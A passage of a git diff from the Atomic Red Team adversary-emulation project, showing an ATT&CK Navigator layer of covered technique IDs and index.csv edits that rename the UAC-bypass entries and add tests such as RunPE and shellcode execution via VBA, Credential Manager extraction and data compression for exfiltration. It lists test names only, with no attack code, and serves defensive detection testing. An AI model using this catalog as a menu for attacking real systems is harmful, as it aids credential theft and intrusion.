nabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 7ae3b587..c6f0fcb8 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -10,14 +10,14 @@ privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/
privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -49,7 +49,9 @@ privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of
privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
+privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
+privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
@@ -63,6 +65,7 @@ privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fe
privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
+privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -156,6 +159,7 @@ persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db
persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
+persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -182,6 +186,7 @@ credential-access,T1552.001,Credentials In Files,1,Extract Browser and System cr
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
+credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
@@ -228,20 +233,51 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
+collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
+collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
+collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
+collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
+collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
+collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
+collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
+collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
+collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
+collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
+collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
+collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
+collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
+collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
+collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
+collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
+collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
+collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
+collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
+collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
+collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
+collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
+collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
+collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
+collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
+collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
+collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
+collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
+collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
